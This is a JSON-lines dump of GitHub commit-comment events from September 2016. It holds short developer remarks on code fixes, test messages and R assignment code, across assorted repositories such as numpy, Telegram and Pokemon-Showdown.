{"id":"4513165756","type":"CommitCommentEvent","actor":{"login":"cnlohr"},"repo":{"name":"cnlohr/esp8266ws2812i2s"},"payload":{"comment":{"id":18891983,"position":null,"line":null,"path":null,"commit_id":"d4395cea5bb17bbe55e0c928b74b0ced1fc8d02d","created_at":"2016-09-04T04:11:33Z","updated_at":"2016-09-04T04:11:33Z","body":"Tested.  Gorgeous (so far).  I just don't have it in me now to pretty up the HTML.  But I tested it.  Works great!"}},"created_at":"2016-09-04T04:11:33Z"}
{"id":"4513167044","type":"CommitCommentEvent","actor":{"login":"liuxiaowei574"},"repo":{"name":"liuxiaowei574/blog"},"payload":{"comment":{"id":18891985,"position":null,"line":null,"path":null,"commit_id":"214ee7bd64fce56afeeb390a0ea929d5ea7f98fa","created_at":"2016-09-04T04:13:10Z","updated_at":"2016-09-04T04:13:10Z","body":"Initial"}},"created_at":"2016-09-04T04:13:10Z"}
{"id":"4513167150","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"bradymiller/openemr"},"payload":{"comment":{"id":18891986,"position":79,"line":156,"path":"interface/patient_tracker/patient_tracker.php","commit_id":"1cdff0e08c6c8b344c5038f8de2377b42f377214","created_at":"2016-09-04T04:13:19Z","updated_at":"2016-09-04T04:13:19Z","body":"TODO for me:\r\ntext()"}},"created_at":"2016-09-04T04:13:19Z"}
{"id":"4513167268","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"bradymiller/openemr"},"payload":{"comment":{"id":18891988,"position":80,"line":157,"path":"interface/patient_tracker/patient_tracker.php","commit_id":"1cdff0e08c6c8b344c5038f8de2377b42f377214","created_at":"2016-09-04T04:13:29Z","updated_at":"2016-09-04T04:13:29Z","body":"TODO for me:\r\ntext()"}},"created_at":"2016-09-04T04:13:29Z"}
{"id":"4513167491","type":"CommitCommentEvent","actor":{"login":"dfbassi"},"repo":{"name":"dfbassi/smartsystem"},"payload":{"comment":{"id":18891989,"position":null,"line":null,"path":null,"commit_id":"425a07b89b45a40ae65ef7aae2453b1252bca5d4","created_at":"2016-09-04T04:13:49Z","updated_at":"2016-09-04T04:13:49Z","body":"Infix operator working, with no precedence, no association"}},"created_at":"2016-09-04T04:13:49Z"}
{"id":"4513172185","type":"CommitCommentEvent","actor":{"login":"ibnujusup"},"repo":{"name":"ibnujusup/belajarhtml"},"payload":{"comment":{"id":18891992,"position":null,"line":null,"path":null,"commit_id":"86a78d53d633eabb53ba9b60dcecacfd9f0360b5","created_at":"2016-09-04T04:18:53Z","updated_at":"2016-09-04T04:18:53Z","body":"test"}},"created_at":"2016-09-04T04:18:53Z"}
{"id":"4513172299","type":"CommitCommentEvent","actor":{"login":"GitCoderr"},"repo":{"name":"GitCoderr/my-second-repo"},"payload":{"comment":{"id":18891993,"position":null,"line":null,"path":null,"commit_id":"920729674c1f0c905a08a7874462e1e0701ff8d9","created_at":"2016-09-04T04:19:02Z","updated_at":"2016-09-04T04:19:02Z","body":"this is a comment"}},"created_at":"2016-09-04T04:19:02Z"}
{"id":"4513172888","type":"CommitCommentEvent","actor":{"login":"yngwiechou"},"repo":{"name":"yngwiechou/xlxd"},"payload":{"comment":{"id":18891994,"position":null,"line":null,"path":null,"commit_id":"62c337b9f48f8a974bb8bcf69187390d207f2a2a","created_at":"2016-09-04T04:19:51Z","updated_at":"2016-09-04T04:19:51Z","body":"Update the call signs for Taiwan"}},"created_at":"2016-09-04T04:19:51Z"}
{"id":"4513173265","type":"CommitCommentEvent","actor":{"login":"yngwiechou"},"repo":{"name":"yngwiechou/xlxd"},"payload":{"comment":{"id":18891995,"position":null,"line":null,"path":null,"commit_id":"4c3e41c7b9e458ed943ae5025d764057e1678fe0","created_at":"2016-09-04T04:20:15Z","updated_at":"2016-09-04T04:20:15Z","body":"Update the call signs for Taiwan"}},"created_at":"2016-09-04T04:20:15Z"}
{"id":"4513177245","type":"CommitCommentEvent","actor":{"login":"Zenexer"},"repo":{"name":"DrKLO/Telegram"},"payload":{"comment":{"id":18891997,"position":5,"line":893,"path":"TMessagesProj/src/main/java/org/telegram/ui/LoginActivity.java","commit_id":"1c74ed4587f9a7e086067165eaea0532a6c33cae","created_at":"2016-09-04T04:24:53Z","updated_at":"2016-09-04T04:24:53Z","body":"What's with this `999` country code, @DrKLO?  I haven't found a phone number that works with it."}},"created_at":"2016-09-04T04:24:53Z"}
{"id":"4513178078","type":"CommitCommentEvent","actor":{"login":"aaomidi"},"repo":{"name":"DrKLO/Telegram"},"payload":{"comment":{"id":18891998,"position":5,"line":893,"path":"TMessagesProj/src/main/java/org/telegram/ui/LoginActivity.java","commit_id":"1c74ed4587f9a7e086067165eaea0532a6c33cae","created_at":"2016-09-04T04:25:46Z","updated_at":"2016-09-04T04:25:46Z","body":"Stop messing with People's code @Zenexer \r\n"}},"created_at":"2016-09-04T04:25:46Z"}
{"id":"4513179697","type":"CommitCommentEvent","actor":{"login":"mervick"},"repo":{"name":"wslsq/emojionearea"},"payload":{"comment":{"id":18891999,"position":null,"line":null,"path":null,"commit_id":"a2f896785798b9230d865e5c221063b6b9cbc3b3","created_at":"2016-09-04T04:27:38Z","updated_at":"2016-09-04T04:27:38Z","body":"Fixed in [v3.1.0](https://github.com/mervick/emojionearea/releases/tag/v3.1.0)"}},"created_at":"2016-09-04T04:27:38Z"}
{"id":"4513180293","type":"CommitCommentEvent","actor":{"login":"engstk"},"repo":{"name":"frap129/angler"},"payload":{"comment":{"id":18892000,"position":null,"line":null,"path":null,"commit_id":"a256b3973638eecbdd357839029272c2b91eeb45","created_at":"2016-09-04T04:28:21Z","updated_at":"2016-09-04T04:28:21Z","body":"on line 93: } else if (display_on && fifo_expire_suspended) {\r\n\r\nI think you mean } else if (!display_on && fifo_expire_suspended) {\r\n\r\nSeems like logic was inverted in your code"}},"created_at":"2016-09-04T04:28:21Z"}
{"id":"4513182427","type":"CommitCommentEvent","actor":{"login":"natch-nacht"},"repo":{"name":"citation-style-language/styles"},"payload":{"comment":{"id":18892001,"position":null,"line":null,"path":null,"commit_id":"df521ad23e00dc122b0a5ba444282c16a5aca0ad","created_at":"2016-09-04T04:30:36Z","updated_at":"2016-09-04T04:30:36Z","body":"Is there a way to separate taxpayers date without the display = \"block\"? in the latest versions of Zotero and Mendeley format is incorrect, and the options of &#10 &#13 or &#NewLine doesn't work."}},"created_at":"2016-09-04T04:30:36Z"}
{"id":"4513188189","type":"CommitCommentEvent","actor":{"login":"rosatolen"},"repo":{"name":"twtiger/gosecco"},"payload":{"comment":{"id":18892006,"position":null,"line":null,"path":null,"commit_id":"86f7e4be3da746bcda1e8eae6e102e35d598e623","created_at":"2016-09-04T04:37:05Z","updated_at":"2016-09-04T04:37:05Z","body":"Yeah it was really weird.\n\nEl viernes, 2 de septiembre de 2016, Fab Torchz <notifications@github.com>\nescribió:\n\n> hm...weird :/\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/twtiger/gosecco/commit/86f7e4be3da746bcda1e8eae6e102e35d598e623#commitcomment-18885262>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACS6nr2k4gnBe4wc8evU9n11HSq_iuGeks5qmHWZgaJpZM4Jz6Vm>\n> .\n>\n\n\n-- \n*Rosalie Tolentino*\n\n*Pure EnergyShe/Her They/Them*\nOffice            San Francisco\nEmailrtolenti@thoughtworks.com\nTelephone+1 650 228 3485\n[image: ThoughtWorks] <http://www.thoughtworks.com/>\n*Fingerprint:  55A0 392B C270 DEBD 6842  A1A7 682A BA98 875D 87B9*\n*This communication may be unlawfully collected and stored by the National\nSecurity Agency (NSA) and/or its allies in secret. The parties to this\nemail do not consent to the retrieving or storing of this communication and\nany related metadata, as well as printing, copying, re-transmitting,\ndisseminating, or otherwise using it. If you believe you have received this\ncommunication in error, please delete it immediately.*\n"}},"created_at":"2016-09-04T04:37:05Z"}
{"id":"4513190636","type":"CommitCommentEvent","actor":{"login":"biophil"},"repo":{"name":"steemit/steem"},"payload":{"comment":{"id":18892007,"position":null,"line":null,"path":null,"commit_id":"6500bb65eb6282866f3c6f356cbcbe09fd03c7bf","created_at":"2016-09-04T04:39:57Z","updated_at":"2016-09-04T04:39:57Z","body":"Can someone explain to me the shenanigans in line 962? Why wouldn't you write\r\n`used_power = used_power/max_vote_denom;` \r\nand be done with it? It would be so much cleaner that way. Is there some integer math reason that I'm missing? Because the  `(max_vote_denom - 1)/max_vote_denom` term is totally superfluous, confusing, and obfuscating from a linear systems standpoint. It would be much better to say \"every vote uses a maximum of a 25th of your available voting power,\" instead of saying \"every vote uses a maximum of a 25th of your available voting power *plus some arbitrary small number.*\""}},"created_at":"2016-09-04T04:39:57Z"}
{"id":"4513195155","type":"CommitCommentEvent","actor":{"login":"benbro"},"repo":{"name":"quilljs/quill"},"payload":{"comment":{"id":18892008,"position":null,"line":null,"path":null,"commit_id":"0c903eb890aecbe168931d45e4c358f420af6ae9","created_at":"2016-09-04T04:45:03Z","updated_at":"2016-09-04T04:45:03Z","body":"The types variable isn't used any more."}},"created_at":"2016-09-04T04:45:03Z"}
{"id":"4513199634","type":"CommitCommentEvent","actor":{"login":"epinapala"},"repo":{"name":"epinapala/mafiabot"},"payload":{"comment":{"id":18892009,"position":18,"line":77,"path":"utils/helper.js","commit_id":"2bbdec8de52e108f08a82d245e79a16776c05ef0","created_at":"2016-09-04T04:50:18Z","updated_at":"2016-09-04T04:50:18Z","body":"@knkteja chip in"}},"created_at":"2016-09-04T04:50:18Z"}
{"id":"4513200476","type":"CommitCommentEvent","actor":{"login":"mrose17"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18892010,"position":null,"line":null,"path":null,"commit_id":"20596da970ad9a8d3e8fbed495a1516f6ba2c8f2","created_at":"2016-09-04T04:51:14Z","updated_at":"2016-09-04T04:51:14Z","body":"fixes: https://github.com/brave/browser-laptop/issues/3702"}},"created_at":"2016-09-04T04:51:14Z"}
{"id":"4513202015","type":"CommitCommentEvent","actor":{"login":"yanglull"},"repo":{"name":"yanglull/yanglull.github.io"},"payload":{"comment":{"id":18892012,"position":null,"line":null,"path":null,"commit_id":"b75a2f64c03f60d2e87f83f543f2183a18a06bc8","created_at":"2016-09-04T04:53:17Z","updated_at":"2016-09-04T04:53:17Z","body":"I'm testing"}},"created_at":"2016-09-04T04:53:17Z"}
{"id":"4513204354","type":"CommitCommentEvent","actor":{"login":"bbq923"},"repo":{"name":"bbq923/Chess_Project"},"payload":{"comment":{"id":18892015,"position":null,"line":null,"path":null,"commit_id":"d71d9dbf18763f1a03f56c252f9b4423e06eaafa","created_at":"2016-09-04T04:56:13Z","updated_at":"2016-09-04T04:56:13Z","body":"Move 클래스의 메소드들 ChessGame 인스턴스를 가지고 있는데, 사실 ChessGame 인스턴스가 필요한건 isPossibleMoveForRook 과 isPossibleMoveForBishop 뿐이다. 이 두 메소드에 넘겨주기 위해 다른 메소드들도 계속 ChessGame을 인자로 받는 것이 신경쓰인다. 다른 방법은 없나?"}},"created_at":"2016-09-04T04:56:13Z"}
{"id":"4513205492","type":"CommitCommentEvent","actor":{"login":"dacaoyuan"},"repo":{"name":"dacaoyuan/drawableDemon"},"payload":{"comment":{"id":18892016,"position":32,"line":10,"path":"README.md","commit_id":"4ad00f5b5972085debb5a5271c9083c8d5e8822c","created_at":"2016-09-04T04:57:37Z","updated_at":"2016-09-04T04:57:37Z","body":"android:state_selected是选中\r\nandroid:state_focused是获得焦点\r\nandroid:state_pressed是点击\r\nandroid:state_enabled是设置是否响应事件,指所有事件"}},"created_at":"2016-09-04T04:57:37Z"}
{"id":"4513205801","type":"CommitCommentEvent","actor":{"login":"Marshall-T"},"repo":{"name":"Marshall-T/Chapter.2.1"},"payload":{"comment":{"id":18892017,"position":null,"line":null,"path":null,"commit_id":"37b55dbfcc79b8a6f73047af450810fafb15665d","created_at":"2016-09-04T04:57:55Z","updated_at":"2016-09-04T04:57:55Z","body":"The date element will not validate with text between the tags.  i.e. <time>September 15, 2015</time> throws an error whether the element is <date> or <time>.  I could not find formatting that would display a text format so for appearances sake I left the text version in the code."}},"created_at":"2016-09-04T04:57:55Z"}
{"id":"4513206085","type":"CommitCommentEvent","actor":{"login":"dacaoyuan"},"repo":{"name":"dacaoyuan/drawableDemon"},"payload":{"comment":{"id":18892018,"position":32,"line":10,"path":"README.md","commit_id":"4ad00f5b5972085debb5a5271c9083c8d5e8822c","created_at":"2016-09-04T04:58:14Z","updated_at":"2016-09-04T04:58:14Z","body":"android:state_selected是选中\r\nandroid:state_focused是获得焦点\r\nandroid:state_pressed是点击\r\nandroid:state_enabled是设置是否响应事件,指所有事件"}},"created_at":"2016-09-04T04:58:14Z"}
{"id":"4513206227","type":"CommitCommentEvent","actor":{"login":"dacaoyuan"},"repo":{"name":"dacaoyuan/drawableDemon"},"payload":{"comment":{"id":18892021,"position":32,"line":10,"path":"README.md","commit_id":"4ad00f5b5972085debb5a5271c9083c8d5e8822c","created_at":"2016-09-04T04:58:24Z","updated_at":"2016-09-04T04:58:24Z","body":"添加"}},"created_at":"2016-09-04T04:58:24Z"}
{"id":"4513207204","type":"CommitCommentEvent","actor":{"login":"alesaiko"},"repo":{"name":"alesaiko/kernel_msm"},"payload":{"comment":{"id":18892024,"position":null,"line":null,"path":null,"commit_id":"8b468160010cd8d104770cc9037e2ea108870937","created_at":"2016-09-04T04:59:45Z","updated_at":"2016-09-04T04:59:45Z","body":"Yep. The sound is working as it should"}},"created_at":"2016-09-04T04:59:45Z"}
{"id":"4513210047","type":"CommitCommentEvent","actor":{"login":"DreadKnight"},"repo":{"name":"FreezingMoon/AncientBeast"},"payload":{"comment":{"id":18892026,"position":null,"line":null,"path":null,"commit_id":"7ff4a4405caf4e6af53302b5bf17d2671c790bc9","created_at":"2016-09-04T05:02:37Z","updated_at":"2016-09-04T05:02:37Z","body":"@cxong regarding Snowy Bunny Freezing Spit sprite animation, will want that stuff fixed, either for 0.3 or 0.4"}},"created_at":"2016-09-04T05:02:37Z"}
{"id":"4513211511","type":"CommitCommentEvent","actor":{"login":"luisvt"},"repo":{"name":"dart-league/ng_bootstrap"},"payload":{"comment":{"id":18892028,"position":15,"line":57,"path":"lib/components/tabsx/tabsx.dart","commit_id":"c04dd43068260ad6cec9ba46981366020dbfde41","created_at":"2016-09-04T05:04:25Z","updated_at":"2016-09-04T05:04:25Z","body":"no, let me check why is there"}},"created_at":"2016-09-04T05:04:25Z"}
{"id":"4513216637","type":"CommitCommentEvent","actor":{"login":"splitt3r"},"repo":{"name":"SilasMahler/maritimehack2016"},"payload":{"comment":{"id":18892033,"position":null,"line":null,"path":null,"commit_id":"6ba292ee5314f5b1495c8186fd498d48219b01f5","created_at":"2016-09-04T05:10:57Z","updated_at":"2016-09-04T05:10:57Z","body":"<oyoyoyoyoyoyo"}},"created_at":"2016-09-04T05:10:57Z"}
{"id":"4513216845","type":"CommitCommentEvent","actor":{"login":"splitt3r"},"repo":{"name":"SilasMahler/maritimehack2016"},"payload":{"comment":{"id":18892034,"position":null,"line":null,"path":null,"commit_id":"53be6514595a6c805250da64746f4fa6e91a5c1c","created_at":"2016-09-04T05:11:12Z","updated_at":"2016-09-04T05:11:12Z","body":"♐ "}},"created_at":"2016-09-04T05:11:12Z"}
{"id":"4513217230","type":"CommitCommentEvent","actor":{"login":"robcore"},"repo":{"name":"alesaiko/kernel_msm"},"payload":{"comment":{"id":18892035,"position":null,"line":null,"path":null,"commit_id":"8b468160010cd8d104770cc9037e2ea108870937","created_at":"2016-09-04T05:11:44Z","updated_at":"2016-09-04T05:11:44Z","body":"Confirmed on a completely different device(gs4, snapdragon 600). Nice! I bumped my local version to 4.3 because of this, and because version increases sound cool : P"}},"created_at":"2016-09-04T05:11:44Z"}
{"id":"4513218286","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18892036,"position":null,"line":null,"path":null,"commit_id":"7126d894cac4112fe75203cf8ffdf7862cbcdf21","created_at":"2016-09-04T05:13:07Z","updated_at":"2016-09-04T05:13:07Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/7126d894cac4112fe75203cf8ffdf7862cbcdf21#commitcomment-18891966) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/f173e921eabe4e73af497e74a3c1a3122a0d44cc/daily_2016_9_4/report.md). cc @jrevels"}},"created_at":"2016-09-04T05:13:07Z"}
{"id":"4513219095","type":"CommitCommentEvent","actor":{"login":"MajorPlayz"},"repo":{"name":"PeaceOfDevs/ServerCore"},"payload":{"comment":{"id":18892038,"position":null,"line":null,"path":null,"commit_id":"c2ea94374648c71c255d3ef9253dafb7fdab14dd","created_at":"2016-09-04T05:14:07Z","updated_at":"2016-09-04T05:14:07Z","body":"Lol barely updated it :D w..ill carry on with the BroadCaster"}},"created_at":"2016-09-04T05:14:07Z"}
{"id":"4513219771","type":"CommitCommentEvent","actor":{"login":"NAOnlyOne"},"repo":{"name":"NAOnlyOne/NAOnlyOne.github.io"},"payload":{"comment":{"id":18892039,"position":null,"line":null,"path":null,"commit_id":"3a05da3fcb36351955cd19a89ffe0270b093e934","created_at":"2016-09-04T05:15:03Z","updated_at":"2016-09-04T05:15:03Z","body":"Commit"}},"created_at":"2016-09-04T05:15:03Z"}
{"id":"4513219810","type":"CommitCommentEvent","actor":{"login":"luisvt"},"repo":{"name":"dart-league/ng_bootstrap"},"payload":{"comment":{"id":18892040,"position":15,"line":57,"path":"lib/components/tabsx/tabsx.dart","commit_id":"c04dd43068260ad6cec9ba46981366020dbfde41","created_at":"2016-09-04T05:15:07Z","updated_at":"2016-09-04T05:15:07Z","body":"corrected on v0.3.4 thanks"}},"created_at":"2016-09-04T05:15:07Z"}
{"id":"4513221530","type":"CommitCommentEvent","actor":{"login":"dufuhang"},"repo":{"name":"dufuhang/dufuhang.github.io"},"payload":{"comment":{"id":18892042,"position":4,"line":4,"path":"README.md","commit_id":"94e012a9371903e59d9804bfea00fd9da2f8eeaa","created_at":"2016-09-04T05:17:13Z","updated_at":"2016-09-04T05:17:13Z","body":"？"}},"created_at":"2016-09-04T05:17:13Z"}
{"id":"4513221913","type":"CommitCommentEvent","actor":{"login":"dufuhang"},"repo":{"name":"dufuhang/dufuhang.github.io"},"payload":{"comment":{"id":18892043,"position":4,"line":4,"path":"README.md","commit_id":"94e012a9371903e59d9804bfea00fd9da2f8eeaa","created_at":"2016-09-04T05:17:42Z","updated_at":"2016-09-04T05:17:42Z","body":"Thanks"}},"created_at":"2016-09-04T05:17:42Z"}
{"id":"4513225267","type":"CommitCommentEvent","actor":{"login":"Drmadhu"},"repo":{"name":"rdpeng/ProgrammingAssignment2"},"payload":{"comment":{"id":18892044,"position":2,"line":2,"path":"cachematrix.R","commit_id":"27987823fcf81d46a5e2186391addd87c079b879","created_at":"2016-09-04T05:22:10Z","updated_at":"2016-09-04T05:22:10Z","body":"---\r\ntitle: \"Assignment2 catchematrix\"\r\nauthor: \"DrMadhubala\"\r\ndate: \"September 3, 2016\"\r\noutput: html_document\r\n---\r\n# Assignment2:Inverse of Matrix:CacheMatrix\r\nCatching the inverse of a matrix includes two functions as: makeCacheMatrix() and cachSolve().\r\n*) makeCacheMatrix():\r\nIt includes the set,get, setmean and getmean functions.\r\n(1)\tGet() returns the vector x stored in the main function.\r\n(2)\tSet()  changes the vector stored in the main function.\r\n(3)\tSetmean() and getmean() are similar to set and get and  don't calculate the mean, it store the output value in m.\r\n\r\n\r\n\r\n```{r setup}\r\nmakeCacheMatrix <- function(x = matrix()) {\r\nm <- NULL\r\nset <- function(y) {\r\nx <<- y\r\nm <<- NULL\r\n}\r\nget <- function() x\r\nsetinverse <- function(solve) m <<- solve\r\ngetinverse <- function() m\r\nlist(set = set, get = get,\r\nsetinverse = setinverse,\r\ngetinverse = getinverse)\r\n}\r\n```\r\n*) cacheSolve():\r\ncomputes the inverse of the special \"matrix\" (which is the input of cachemean) returned by makeCacheMatrix(). If the inverse has already been calculated (and the matrix has not changed), then the cachesolve should retrieve the inverse from the cache. If the inverse has not been calculated, data gets the matrix stored with makeCacheMatrix, m calculates the inverse, and x$setmean(m) stores it in the object m in makeCacheMatrix.\r\n\r\n\r\n```{r up}\r\n\r\ncacheSolve <- function(x, ...) {\r\nm <- x$getinverse()\r\nif(!is.null(m)) {\r\nmessage(\"getting cached data\")\r\nreturn(m)\r\n}\r\ndata <- x$get()\r\nm <- solve(data, ...)\r\nx$setinverse(m)\r\nm\r\n}\r\n\r\n```\r\n\r\n#Example:\r\n```{r pressure, echo=FALSE}\r\na <- diag(5,3)\r\na\r\nCachedMarix <- makeCacheMatrix(a)\r\ncacheSolve(CachedMarix)\r\n\r\n```\r\n\r\n\r\n"}},"created_at":"2016-09-04T05:22:10Z"}
{"id":"4513225919","type":"CommitCommentEvent","actor":{"login":"cudnn"},"repo":{"name":"ArduPilot/ardupilot"},"payload":{"comment":{"id":18892045,"position":null,"line":null,"path":null,"commit_id":"6fdaaa7d98fdc80971ab7b48649293f3a8d9513c","created_at":"2016-09-04T05:23:04Z","updated_at":"2016-09-04T05:23:04Z","body":"hi ,did you look at \r\n\r\nissue.  Copter: support for copter-o-plane #4760\r\n\r\nmay i use ahrs.rotate. make bodyframe pitch 90. train copter to plane"}},"created_at":"2016-09-04T05:23:04Z"}
{"id":"4513225963","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18892046,"position":null,"line":null,"path":null,"commit_id":"6f53fcff3a910c5900482c25b6c5045ca0b928f1","created_at":"2016-09-04T05:23:07Z","updated_at":"2016-09-04T05:23:07Z","body":"I feel like this commit will break things that relied on this check..."}},"created_at":"2016-09-04T05:23:07Z"}
{"id":"4513226088","type":"CommitCommentEvent","actor":{"login":"Drmadhu"},"repo":{"name":"rdpeng/ProgrammingAssignment2"},"payload":{"comment":{"id":18892047,"position":2,"line":2,"path":"cachematrix.R","commit_id":"27987823fcf81d46a5e2186391addd87c079b879","created_at":"2016-09-04T05:23:19Z","updated_at":"2016-09-04T05:23:19Z","body":"Catching the inverse of a matrix includes two functions as: makeCacheMatrix() and cachSolve().\r\n*) makeCacheMatrix():\r\nIt includes the set,get, setmean and getmean functions.\r\n(1)\tGet() returns the vector x stored in the main function.\r\n(2)\tSet()  changes the vector stored in the main function.\r\n(3)\tSetmean() and getmean() are similar to set and get and  don't calculate the mean, it store the output value in m.\r\n"}},"created_at":"2016-09-04T05:23:19Z"}
{"id":"4513227262","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18892049,"position":null,"line":null,"path":null,"commit_id":"6f53fcff3a910c5900482c25b6c5045ca0b928f1","created_at":"2016-09-04T05:24:54Z","updated_at":"2016-09-04T05:24:54Z","body":"https://github.com/Zarel/Pokemon-Showdown/search?utf8=%E2%9C%93&q=broadcasting\r\n\r\nIt's also still documented in ``chat-plugins/COMMANDS.md`` :|"}},"created_at":"2016-09-04T05:24:54Z"}
{"id":"4513227319","type":"CommitCommentEvent","actor":{"login":"squeek502"},"repo":{"name":"squeek502/VeganOption"},"payload":{"comment":{"id":18892050,"position":null,"line":null,"path":null,"commit_id":"07d17e9389bf4f1bb27dde9337ab780cf21c310a","created_at":"2016-09-04T05:24:59Z","updated_at":"2016-09-04T05:24:59Z","body":"I don't really understand why this is beneficial. It seems like it just adds more realtime lookups in place of caching (like querying the world for isBlockPowered in getActualState instead of querying the TileEntity instance's cached value)."}},"created_at":"2016-09-04T05:24:59Z"}
{"id":"4513227363","type":"CommitCommentEvent","actor":{"login":"Drmadhu"},"repo":{"name":"rdpeng/ProgrammingAssignment2"},"payload":{"comment":{"id":18892051,"position":4,"line":4,"path":"cachematrix.R","commit_id":"27987823fcf81d46a5e2186391addd87c079b879","created_at":"2016-09-04T05:25:03Z","updated_at":"2016-09-04T05:25:03Z","body":"m <- NULL\r\nset <- function(y) {\r\nx <<- y\r\nm <<- NULL\r\n}\r\nget <- function() x\r\nsetinverse <- function(solve) m <<- solve\r\ngetinverse <- function() m\r\nlist(set = set, get = get,\r\nsetinverse = setinverse,\r\ngetinverse = getinverse)"}},"created_at":"2016-09-04T05:25:03Z"}
{"id":"4513227950","type":"CommitCommentEvent","actor":{"login":"dufuhang"},"repo":{"name":"dufuhang/dufuhang.github.io"},"payload":{"comment":{"id":18892052,"position":4,"line":44,"path":"index.html","commit_id":"a8608fc4a772f58cf1b4f2c473c8f45af866f17c","created_at":"2016-09-04T05:25:48Z","updated_at":"2016-09-04T05:25:48Z","body":"delete"}},"created_at":"2016-09-04T05:25:48Z"}
{"id":"4513228544","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18892054,"position":null,"line":null,"path":null,"commit_id":"6f53fcff3a910c5900482c25b6c5045ca0b928f1","created_at":"2016-09-04T05:26:36Z","updated_at":"2016-09-04T05:26:36Z","body":"I believe what \"weird bugs\" this has to do with is more so the improper use of ``this.canBroadcast()`` :|"}},"created_at":"2016-09-04T05:26:36Z"}
{"id":"4513229282","type":"CommitCommentEvent","actor":{"login":"Drmadhu"},"repo":{"name":"rdpeng/ProgrammingAssignment2"},"payload":{"comment":{"id":18892055,"position":9,"line":9,"path":"cachematrix.R","commit_id":"27987823fcf81d46a5e2186391addd87c079b879","created_at":"2016-09-04T05:27:30Z","updated_at":"2016-09-04T05:27:30Z","body":"m <- x$getinverse()\r\nif(!is.null(m)) {\r\nmessage(\"getting cached data\")\r\nreturn(m)\r\n}\r\ndata <- x$get()\r\nm <- solve(data, ...)\r\nx$setinverse(m)\r\nm"}},"created_at":"2016-09-04T05:27:30Z"}
{"id":"4513230613","type":"CommitCommentEvent","actor":{"login":"Drmadhu"},"repo":{"name":"rdpeng/ProgrammingAssignment2"},"payload":{"comment":{"id":18892058,"position":10,"line":10,"path":"cachematrix.R","commit_id":"27987823fcf81d46a5e2186391addd87c079b879","created_at":"2016-09-04T05:29:14Z","updated_at":"2016-09-04T05:29:14Z","body":"}\r\n#Example:\r\na <- diag(5,3)\r\na\r\nCachedMarix <- makeCacheMatrix(a)\r\ncacheSolve(CachedMarix)"}},"created_at":"2016-09-04T05:29:14Z"}
{"id":"4513232852","type":"CommitCommentEvent","actor":{"login":"Drmadhu"},"repo":{"name":"rdpeng/ProgrammingAssignment2"},"payload":{"comment":{"id":18892063,"position":10,"line":10,"path":"cachematrix.R","commit_id":"27987823fcf81d46a5e2186391addd87c079b879","created_at":"2016-09-04T05:31:58Z","updated_at":"2016-09-04T05:31:58Z","body":"Please review my addition and send your comments"}},"created_at":"2016-09-04T05:31:58Z"}
{"id":"4513235188","type":"CommitCommentEvent","actor":{"login":"WarrenWeckesser"},"repo":{"name":"numpy/numpy"},"payload":{"comment":{"id":18892069,"position":4,"line":367,"path":"numpy/distutils/fcompiler/gnu.py","commit_id":"b831444bee734537daeaffd1455eb88663ee3763","created_at":"2016-09-04T05:34:58Z","updated_at":"2016-09-04T05:34:58Z","body":"This is not correct.  `fid` is an integer.  This should be `os.close(fid)`."}},"created_at":"2016-09-04T05:34:58Z"}
{"id":"4513236712","type":"CommitCommentEvent","actor":{"login":"tiagoor"},"repo":{"name":"tiagoor/trvsty-docker-openstack-dev"},"payload":{"comment":{"id":18892073,"position":null,"line":null,"path":null,"commit_id":"659cc3406c5deff1d16f8897050a999ac14b41da","created_at":"2016-09-04T05:36:46Z","updated_at":"2016-09-04T05:36:46Z","body":"0k."}},"created_at":"2016-09-04T05:36:46Z"}
{"id":"4513238144","type":"CommitCommentEvent","actor":{"login":"JohnHub76"},"repo":{"name":"yurkinx/yii2-rss"},"payload":{"comment":{"id":18892074,"position":3,"line":17,"path":"composer.json","commit_id":"709ab448a0465bd064b76b1e793bda293eb46693","created_at":"2016-09-04T05:38:23Z","updated_at":"2016-09-04T05:38:23Z","body":"change \"dev-master\" to \"> version no\""}},"created_at":"2016-09-04T05:38:23Z"}
{"id":"4513239568","type":"CommitCommentEvent","actor":{"login":"spjcanfly"},"repo":{"name":"spjcanfly/test"},"payload":{"comment":{"id":18892075,"position":null,"line":null,"path":null,"commit_id":"92673e61e317d0eac3f8227aa8c40ee61cea65f4","created_at":"2016-09-04T05:40:08Z","updated_at":"2016-09-04T05:40:08Z","body":"都是比较基础，但是极为重要的"}},"created_at":"2016-09-04T05:40:08Z"}
{"id":"4513251846","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18892078,"position":null,"line":null,"path":null,"commit_id":"6f53fcff3a910c5900482c25b6c5045ca0b928f1","created_at":"2016-09-04T05:55:03Z","updated_at":"2016-09-04T05:55:03Z","body":"Those are all instances of `CommandContext#broadcasting`, not `User#broadcasting`. `User#broadcasting` isn't used for anything; afaik."}},"created_at":"2016-09-04T05:55:03Z"}
{"id":"4513253801","type":"CommitCommentEvent","actor":{"login":"donbright"},"repo":{"name":"openscad/openscad"},"payload":{"comment":{"id":18892081,"position":48,"line":38,"path":"tests/virtualfb.sh","commit_id":"fb30128f6cde44b005647fdb0e217f97690cb549","created_at":"2016-09-04T05:57:27Z","updated_at":"2016-09-04T05:57:27Z","body":"lol oops, didnt mean to remove this comment"}},"created_at":"2016-09-04T05:57:27Z"}
